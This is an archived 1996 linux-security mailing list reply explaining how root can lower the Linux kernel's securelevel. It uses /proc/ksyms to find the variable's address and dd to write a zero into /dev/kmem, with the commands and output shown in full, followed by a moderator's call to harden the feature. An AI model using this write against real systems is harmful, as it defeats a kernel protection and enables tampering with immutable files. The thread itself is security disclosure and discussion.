[Date Prev][Date Next] [Thread Prev][Thread Next] [Thread Index] [Date Index] [Author Index]

Re: [linux-security] Chattr +i and securelevel

From: Tronicek Zdenek student 6_96_97 k336 <xtronice sun felk cvut cz>
To: linux-security redhat com
Subject: Re: [linux-security] Chattr +i and securelevel
Date: Wed, 20 Nov 1996 10:58:55 +0100 (MET)

> 
> has anyone played with the securelevel variable in the kernel and the 
> immutable flags in the ext2 file system?
> 
> The only way I have found to change the flag is by
> patching sched.c from
> 
> int securelevel=0
> to int securelevel=1
> 
> The sysctrl code seems to allow the setting of the flag
> only by init (PID=1) and only upwards (0->1, etc).
> The problem is that I haven't found a way to get
> init to set the securelevel variable. 
> Is securelevel used in the Linux community?
> 
 
Once you are root, you can change securelevel this way:
(0x001a8f64 == 1740644)

# cat /proc/sys/kernel/securelevel
1
# cat /proc/ksyms | grep securelevel
001a8f64 securelevel
# dd if=/dev/zero of=/dev/kmem seek=1740644 bs=1 count=1
1+0 records in
1+0 records out
# cat /proc/sys/kernel/securelevel
0
#

And now you are the king of machine :)

Zdenek Tronicek, CTU Prague

[mod: Yes. the "securelevel" implementation is VERY preliminary.  A
college student would need about 1-8 hours to get to the point that
this and many other methods wouldn't work anymore. In short: Someone,
get out of your bed and DO IT! -- REW.]

References:
- Chattr +i and securelevel
  - From: E. Lefty Kreouzis

[Date Prev][Date Next] [Thread Prev][Thread Next] [Thread Index] [Date Index] [Author Index]